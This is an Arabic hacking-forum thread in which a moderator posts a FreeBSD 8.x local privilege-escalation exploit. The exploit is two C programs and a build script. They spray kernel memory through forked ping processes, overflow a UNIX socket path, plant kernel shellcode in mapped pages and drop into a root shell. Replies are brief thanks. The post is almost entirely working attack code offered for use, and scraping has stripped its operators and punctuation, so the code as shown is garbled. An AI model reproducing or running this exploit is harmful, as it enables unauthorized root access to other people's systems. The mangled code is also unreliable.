تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة



اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية النينجا المخترق
النينجا المخترق
مشرف
النينجا المخترق غير متواجد حالياً
 
رقم العضوية : 31633
تاريخ التسجيل : Oct 2012
مكان الإقامة :
عدد المشاركات : 301
عدد النقاط : 10
قوة التقييم :
XplOiT3r
افتراضي Unix FreeBSD 8.x locaroot

كُتب : [ 02-08-2014 - 07:08 PM ]


السلام عليكم ورحمة الله وبركاته

اليوم جايبلكم لوكال روت قوي جدا
Unix FreeBSD 8.x locaroot

تشغيل الرووت :

start.sh
كود PHP:
#!/bin/sh
 
gcc free.-o free
 gcc newsock
.-new
 ./
free && ./new 
اللوكال رووت :
كود PHP:
#include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 
 #include <signal.h>
 #include <sys/types.h>
 #include <unistd.h>
 #include <fcntl.h>
 
 
int nullfd;
 
 
int get_free(void)
 {
    
FILE *pfile popen("vmstat -z | grep 128:""r");
    if(
pfile == NULL)
        return -
1;
 
    
char buffer[256];
    
int free_item 0;
    
fread(buffersizeof(buffer), 1pfile);
    
sscanf(buffer"%*s %*u, %*u, %*u, %u, %*u, %*u", &free_item);
 
    
pclose(pfile);
 
    return 
free_item;
 }
 
 
int alloc_item_per_fork()
 {
    
int fitemitem get_free();
    
forker("3");
    
sleep(1);
    
fitem get_free();
 
    
//printf("%d %d", item, fitem);
    
return ((fitem item) > ? (item fitem) : 0); 
 }
 
 
int forker(char *time)
 {
    
pid_t pid;
 
    if(!(
pid fork())) {
        
dup2(nullfd1);
        
dup2(nullfd2);
      
//  char *arg[] = { "/bin/sleep", time, NULL };
        
char *arg[] = { "/sbin/ping""-c"time"127.0.0.1"NULL };
        
execv(*argarg);
        exit(
0);
    } else if (
pid 0) {
        
perror("Fork error");
    }
 
    return 
pid;
 }
 
 
int main(void)
 {
     
pid_t pid;
     
int i 0;
     
int statusitem;
     
     
nullfd open("/dev/null"O_RDWR);
     if(
nullfd 0) {
         
perror("open /dev/null error");
         return -
2;
     }
 
     
item alloc_item_per_fork();
 
     if(!
item) {
       
fprintf(stderr"Can't get %d\n"item);
       return -
1;
     }
 
     
unsigned int free_items get_free() + (9*item);
     
printf("Before allocation free items: %d\n"get_free());
     
free_items = (free_items 32) ? 32 free_items;
 
     
pid_t *progs malloc(sizeof(pid_t) * free_items);
 
     for(
0free_items 32+= item) {
         
progs[i] = forker("5000");
         
printf("Current pid [%d] free items: %d\n"progs[i], get_free());
     }
     
printf("After allocation free items: %d\n"get_free());
     for(
free_items 32free_items+= item) {
       
progs[i] = forker("5");
       
printf("Current pid [%d] free: %d\n"progs[i], get_free());
     }
     
printf("Current free items %d\nSleep 6 seconds ...\n"get_free());
     
sleep(6);
    
     
printf("End = %u\n"get_free());
     return 
0;
 }
 
 
 
 
newsock.c
 
#include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 
 #include <signal.h>
 #include <unistd.h>
 #include <fcntl.h>
 
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <sys/un.h>
 #include <fcntl.h>
 
 #include <sys/stat.h>
 #include <sys/mman.h>
 
 
struct mystruct {
         
short sun_family;
         
char sun_path[238];
 };
 
 
int nullfd;
 
 
char shellcode[] =
 
//"\xcc"
 
"\x64\xa1\x00\x00\x00\x00"
 "\x8b\x40\x04"
 "\x8b\x40\x24"
 "\x31\xdb"
 "\x89\x58\x04"
 "\x89\x58\x08"
 "\x8b\x81\x00\xf0\xff\xff"
 "\x83\xf8\x00"
 "\x74\x02"
 "\xeb\x06"
 "\x8b\x81\x00\x10\x00\x00"
 "\x89\x01"
;
 
 
 
int get_free(void)
 {
    
FILE *pfile popen("vmstat -z | grep 128:""r");
    if(
pfile == NULL)
        return -
1;
 
    
char buffer[256];
    
int free_item 0;
    
fread(buffersizeof(buffer), 1pfile);
    
sscanf(buffer"%*s %*u, %*u, %*u, %u, %*u, %*u", &free_item);
 
    
pclose(pfile);
 
    return 
free_item;
 }
 
 
int forker(char *time)
 {
    
pid_t pid;
    
nullfd open("/dev/null"O_RDONLY);
    if(
nullfd 0) {
       
perror("Can't open null");
       return -
1;
    }
 
    if(!(
pid fork())) {
        
dup2(nullfd1);
        
dup2(nullfd2);
        
char *arg[] = { "/sbin/ping""-c"time"127.0.0.1"NULL };
        
execv(*argarg);
        exit(
0);
    } else if (
pid 0) {
        
perror("Fork error");
    }
 
    return 
pid;
 }
 
 
int main(void)
 {
         
int sdcli;
         
struct mystruct saddr;
 
         
sd socket(PF_UNIXSOCK_STREAM0);
         
saddr.sun_family AF_UNIX;
         
memset(saddr.sun_path'A'237);
         
saddr.sun_path[237] = 0x0;
 
         
void *vptr mmap((void *)0x4140004096PROT_READ PROT_WRITEMAP_FIXED MAP_ANON MAP_PRIVATE, -10);
         if(
vptr == MAP_FAILED){
                 
perror("mmap for slab failed");
                 return -
1;
         }
 
         
void *zfree_mmap mmap((void *)0x101010004096PROT_READ PROT_WRITEMAP_FIXED MAP_ANON MAP_PRIVATE, -10);
         if(
zfree_mmap == MAP_FAILED) {
                 
perror("mmap for keg failed");
                 return -
1;
         }
 
         
void *sc_mmap mmap((void *)0x666660004096PROT_READ PROT_WRITEMAP_FIXED MAP_ANON MAP_PRIVATE, -10);
         if(
sc_mmap == MAP_FAILED) {
                 
perror("mmap for dtors failed");
                 return -
2;
         }
         
memset((void *)0x4140000x104096);
         
memset((void *)0x101010000x454096);
 
         
void *ptr sc_mmap 0x666;
         
memcpy(ptrshellcodesizeof(shellcode)-1);
         
ptr += sizeof(shellcode)-1;
         
memset(ptr0x5b13);
         
ptr += 13;
         *(
unsigned char *)ptr 0xc3;
 
         *(
unsigned long *)(zfree_mmap+0x40) = (unsigned long)0x66666666;
         if(
bind(sd, (struct sockaddr*)&saddrsizeof(saddr))) {
                 
perror("bind");
         return -
1;
     }
 
         
struct mystruct myaddr;
         
int size 255;
         
int l 0;
 
         while(
210) {
             
getsockname(sd, (struct sockaddr*)&myaddr, &size);
             if(!
getuid() || !geteuid()) {
                
fprintf(stderr"ROOT!!!\n");
                
close(sd);
                
unlink(saddr.sun_path);
                
system("killall ping");
                
system("sh -i");
                return 
0;
             }
             
fprintf(stderr"Try [%d] free items: %d\n"lget_free());
             
forker("5000");
             
++;
        }
 
     
close(sd);
     return 
0;
 } 
...


توقيع : النينجا المخترق



آخر تعديل بواسطة النينجا المخترق ، 02-08-2014 الساعة 07:12 PM سبب آخر: خطأ
رد مع إقتباس
الأعضاء الذين آرسلوا آعجاب لـ النينجا المخترق على المشاركة المفيدة:
H4x0r-Dz (02-13-2014)
بياناتي
 رقم المشاركة : ( 2 )
moukawem
مشرف
رقم العضوية : 2704
تاريخ التسجيل : Oct 2009
مكان الإقامة :
عدد المشاركات : 538
عدد النقاط : 10

moukawem غير متواجد حالياً

**MaStEr-X**

افتراضي

كُتب : [ 02-16-2014 - 10:03 PM ]


مشكور أخي...
ننتظر جديدك يا وحش

توقيع : moukawem

تقوى الإله وذلتي .. عند الصلاة طريقتي
و القلب دوما شاكر .. أو صابر في شدة
و سلامتي في وقفتي .. يوم الوغى بشجاعة
نصرا لديني و الدما .. بشرى بقرب شهادة

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 3 )
النينجا المخترق
مشرف
رقم العضوية : 31633
تاريخ التسجيل : Oct 2012
مكان الإقامة :
عدد المشاركات : 301
عدد النقاط : 10

النينجا المخترق غير متواجد حالياً

XplOiT3r

افتراضي

كُتب : [ 02-16-2014 - 10:40 PM ]


نورت الموضوع اخي moukawem

توقيع : النينجا المخترق


رد مع إقتباس

اضافة رد

العلامات المرجعية

الكلمات الدلالية (Tags)
freebsd, locaroot, unix


يتصفح الموضوع حالياً : 1 (0 قرصان و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
حصريآآآ .. FreeBSD Kernel 7.x/8.x 2010 Dr.SiLnT HilL Local root 12 06-28-2011 07:05 AM
FreeBSD 7.2-RELEASE muslim Local root 7 12-03-2010 05:42 PM
FreeBSD 7.2 devfs kevent() Race Condition Explo mr.le0n .:: قسم الثغرات ::. 1 08-11-2010 08:28 PM
اكتشاف ثغرة local root في أنظمة FreeBSD Mr.viktoor .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. 3 03-16-2010 07:15 PM


جميع الأوقات بتوقيت GMT +2. الساعة الآن 10:44 PM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @ قسم الحقن المٌتقَدِّم [بداية العهد] @